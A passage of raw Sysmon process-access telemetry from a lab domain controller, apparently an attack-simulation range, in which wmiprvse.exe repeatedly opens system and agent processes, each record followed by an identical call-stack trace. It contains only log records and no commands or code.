Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 